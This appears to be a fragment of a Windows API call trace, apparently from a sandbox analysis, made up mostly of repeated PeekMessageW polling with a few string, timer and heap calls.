lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.309] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.310] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.311] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.312] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.313] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.313] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.314] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 1 [0145.314] TranslateMessage (lpMsg=0x8bf230) returned 0 [0145.314] DispatchMessageW (lpMsg=0x8bf230) returned 0x0 [0145.314] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0145.314] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0145.315] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12d8 [0145.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 